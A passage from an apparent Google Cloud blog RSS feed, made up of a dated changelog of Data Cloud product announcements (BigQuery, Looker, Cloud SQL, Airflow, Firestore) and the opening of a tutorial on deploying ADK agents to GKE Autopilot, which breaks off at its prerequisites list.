&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud Engineer's AI Toolkit Workshops: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Solve data-driven challenges with &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;BigQuery, AlloyDB&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; and more. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Hosted by Google Cloud Labs, this highly technical event is built specifically for Platform Engineers, SREs, and cloud infrastructure teams ready to bridge the gap between AI prototypes and production-grade deployments. Look out for more locations coming soon&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Toronto&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; - June 25 (Data Cloud) | &lt;/span&gt;&lt;a href="https://rsvp.withgoogle.com/events/google-cloud-labs-data-cloud-toronto" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RSVP Here&lt;/span&gt;&lt;/a&gt;&lt;br/&gt;&lt;strong style="vertical-align: baseline;"&gt;Chicago&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; - June 30 (Data Cloud) | &lt;/span&gt;&lt;a href="https://rsvp.withgoogle.com/events/google-cloud-labs-data-cloud-chicago" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RSVP Here&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Start a 10-day &lt;/strong&gt;&lt;a href="https://cloud.google.com/bigtable"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Bigtable&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; free trial with a 1 node SSD cluster and up to 500GB of storage capacity. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;W&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ith no credit card required to start, you can easily ingest workloads and manage workloads that require low-latency, high-throughput, and predictable access. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Plus, new Google Cloud customers get &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/sql/docs/mysql/create-free-trial-instance"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;$300 in free credits&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on signup.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;May 11 - May 15&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed Service for Apache Airflow&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; has launched a wave of new features, including the general availability of Airflow 3.1, AI-powered agentic troubleshooting, a new managed Airflow MCP Server for custom agent integration, and declarative YAML-based orchestration pipelines—discover all the details in the&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/managed-apache-airflow-scaling-data-and-ai-workloads"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;full blog post&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;April 20 - April 24&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Google-built ODBC Driver for BigQuery is now available in Preview&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce the launch of the new, Google-built ODBC driver for BigQuery. This new open-source driver provides a direct, high-performance connection for applications to BigQuery and is developed entirely in-house by Google. &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/odbc-for-bigquery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Download a new driver and connect your application to BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;April 13 - April 17&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We announced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/looker-studio-is-data-studio"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;we are reintroducing Data Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to play a significant role in the AI era, expanding from data visualizations and reports to host BigQuery conversational agents and data apps built in Colab notebooks.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;We announced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-bigquery-graph"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Graph is now available in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, offering an easy-to-use, highly scalable graph analytics solution, empowering data professionals to model, analyze and visualize massive-scale relationships in an entirely new way. &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;April 6 - April 10&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/business-intelligence/looker-embedded-adds-conversational-analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Conversational Analytics for Looker Embedded environments&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, enabling users to add natural language experiences to their own custom data-driven applications, powered by Gemini. &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;We expanded Looker’s capabilities for faster ad-hoc analysis, with the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/business-intelligence/looker-self-service-explores"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;introduction of self-service Explores&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, enabling you to bring your own data to Looker’s semantic layer and gain instant access to insights in a governed data environment.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;March 23 - March 27&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We showed you how you can &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/cloudsql-read-pools-support-autoscaling"&gt;&lt;span style="vertical-align: baseline;"&gt;scale your reads with Cloud SQL autoscaling read pools.&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; This feature allows you to provision multiple read replicas that are accessible via a single read endpoint and to dynamically adjust your read capability based on real-time application needs. &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Our customers are leveraging the full power of Conversational Analytics and Looker to drive major business and technical breakthroughs in the AI era. Companies like &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/telenor-looker"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Telenor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/petcircle-looker"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Pet Circle&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/fluent-commerce"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Fluent Commerce&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/lighthouse"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lighthouse Intelligence&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/wego"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Wego&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/roller"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ROLLER&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are turning data into insights and actions, grounded by Looker’s semantic layer.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;March 16 - March 20&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;We introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/gemini-supercharges-the-bigquery-studio-assistant"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;an enhanced Gemini assistant in BigQuery Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, transforming the agent from a code assistant into a fully context-aware analytics partner.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;February 23 - February 27&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/managed-mcp-servers-for-google-cloud-databases"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;managed and remote MCP support for Google Cloud databases&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, including AlloyDB, Spanner, Cloud SQL, Bigtable and Firestore, to power the next generation of agents. This announcement extends the ability for AI models to plan, build, and solve complex problems, connecting to the database tools our customers leverage daily as the backbone of their work environment.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;We outlined how you can &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/build-data-agents-with-conversational-analytics-api"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;build a conversational agent in BigQuery using the Conversational Analytics API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to help you build context-aware agents that can understand natural language, query your BigQuery data, and deliver answers in text, tables, and visual charts.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;February 16 - February 20&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Our customers are leveraging the full power of Looker to drive major business and technical breakthroughs. Companies like &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/arrive"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Arrive&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/audika"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Audika&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/looker-carousell"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Carousell&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/framebridge"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Framebridge&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/gumgum"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GumGum&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/intel-looker"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Intel&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/overdose-digital"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Overdose Digital&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a 
href="https://cloud.google.com/customers/one-looker"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Ocean Network Express&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/subskribe"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Subskribe&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/promevo-looker"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Promevo&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are using Looker’s newest AI-driven capabilities, including Conversational Analytics, to transform data into insights and actions, and to empower their entire organization with a single source of truth, powered by Looker’s semantic layer.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;February 2 - February 6&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Join us on March 4 for our webinar, Win Your AI Strategy with Cloud SQL Enterprise Plus, to learn how to power your generative AI workloads with 3x higher performance and 99.99% availability. &lt;/span&gt;&lt;a href="https://rsvp.withgoogle.com/events/win-your-ai-strategy-with-cloud-sql-enterprise-plus" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Register today&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to discover how to build a scalable, enterprise-grade foundation for your most demanding AI applications.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;January 26 - January 30&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-conversational-analytics-in-bigquery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Conversational Analytics in BigQuery&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, which allows users to analyze data using natural language.&lt;/span&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;Conversational Analytics in BigQuery is an intelligent agent that generates, executes and visualizes answers grounded in your business context directly in BigQuery Studio, making data insights for data professionals more conversational.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We outlined how &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/from-asset-to-action-how-data-products-have-become-the-foundation-for-ai-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;data products have become the foundation for AI agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, providing the context needed to make autonomous agents reliable and trusted for real business use, backed by organized business logic and semantic understanding.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;We highlighted how &lt;/span&gt;&lt;a href="https://cloud.google.com/use-cases/data-analytics-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;you can supercharge data analytics workflows&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and outlined Google Cloud’s AI agent offerings for data engineering, data science, and development tools, so you can integrate agentic workflows in your applications, empower your teams and speed discovery.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;January 19 - January 23&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;We have fundamentally reimagined &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/new-firestore-query-engine-enables-pipelines"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Firestore with pipeline operations for Enterprise edition&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://www.mssqltips.com/sqlservertip/11578/introducing-google-cloud-sql/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Introducing Google Cloud SQL on MSSQLTips&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We are highlighting a new technical guide published on MSSQLTips titled "Introducing Google Cloud SQL." This article serves as an essential resource for SQL Server administrators and developers exploring Google Cloud's fully managed database service. It provides a detailed overview of Cloud SQL capabilities, including high availability, security integration, and the seamless transition of on-premises SQL Server workloads to the cloud, making it an ideal resource for those planning their migration strategy.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce the &lt;/span&gt;&lt;strong&gt;&lt;a href="https://medium.com/google-cloud/bridging-the-identity-gap-microsoft-entra-id-integration-with-cloud-sql-for-sql-server-a30207d63035" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Public Preview of Microsoft Entra ID&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; (formerly Azure Active Directory) integration with Cloud SQL for SQL Server. Designed to tackle the challenge of identity sprawl in multi-cloud environments, this integration allows organizations to govern database access using their existing Microsoft identity infrastructure. Key benefits include centralized identity management, enhanced security features like Multi-Factor Authentication (MFA), and simplified user administration through direct group mapping. This feature is available for SQL Server 2022 and supports both public and private IP configurations.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;January 12 - January 16&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Google-built JDBC Driver for BigQuery is now available in Preview&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce the launch of the new, Google-built JDBC driver for BigQuery. This new open-source driver provides a direct, high-performance connection for Java applications to BigQuery and is developed entirely in-house by Google. &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/jdbc-for-bigquery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Download a new driver and connect your Java application to BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Troubleshoot Airflow tasks instantly with Gemini Cloud Assist investigations:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Cloud Composer just got smarter. We are excited to announce that &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Cloud Assist investigations &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;are now available directly within&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; Cloud Composer 3&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Instead of manually sifting through raw logs, you can now simply click "Investigate" on a failed Airflow task. Gemini analyzes logs and task metadata to identify failure patterns—such as resource exhaustion or timeouts—and provides actionable recommendations driven by Gemini Cloud Assist to resolve the issue. This integration shifts the debugging experience from manual toil to automated root cause analysis, significantly reducing the time required to restore your pipelines.&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/composer/docs/composer-3/troubleshooting-dags#investigations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more about AI-assisted troubleshooting&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-related_article_tout"&gt;






&lt;/div&gt;</description><pubDate>Thu, 04 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/data-analytics/whats-new-with-google-data-cloud/</guid><category>Databases</category><category>Business Intelligence</category><category>Data Analytics</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/whats_new_data_cloud_fWg4bKK.png" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>What’s new with Google Data Cloud</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/original_images/whats_new_data_cloud_fWg4bKK.png</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/data-analytics/whats-new-with-google-data-cloud/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>The Google Cloud Data Analytics, BI, and Database teams </name><title></title><department></department><company></company></author></item><item><title>Scaling AI Agents: A Step-by-Step Guide to Deploying ADK on GKE Autopilot</title><link>https://cloud.google.com/blog/topics/developers-practitioners/scaling-ai-agents-a-step-by-step-guide-to-deploying-adk-on-gke-autopilot/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While building AI agents locally using Google’s Agent Development Kit (ADK) is an excellent way to prototype, production-ready agents require a robust, scalable infrastructure. For developers looking to move beyond simple instances and into the world of managed container orchestration, Google Kubernetes Engine (GKE) Autopilot offers the perfect balance of flexibility and ease of use.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this tutorial, I will walk you through building a technical agent with ADK and deploying it to GKE Autopilot. We will use Gemini on Vertex AI as the core model and follow security best practices by using Workload Identity for permission management.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Understanding the GKE ADK Architecture&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploying an ADK agent on GKE Autopilot involves more than just running a container. We leverage GKE's native capabilities to handle scaling and security. Our architecture consists of an ADK-based Python application packaged as a Docker image and stored in Artifact Registry. This container runs as a Deployment on GKE Autopilot, where it communicates securely with Vertex AI using Workload Identity—mapping a Kubernetes Service Account to a Google Cloud IAM Service Account.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;To expose the agent to the world, we use the Kubernetes Gateway API, the modern successor to Ingress, which provides a cleaner separation of concerns and native support for Google Cloud Load Balancing.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Prerequisites&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Before we begin, ensure you have the following tools and accounts ready:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Python 3.10 or higher.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code style="vertical-align: baseline;"&gt;uv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for package management.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
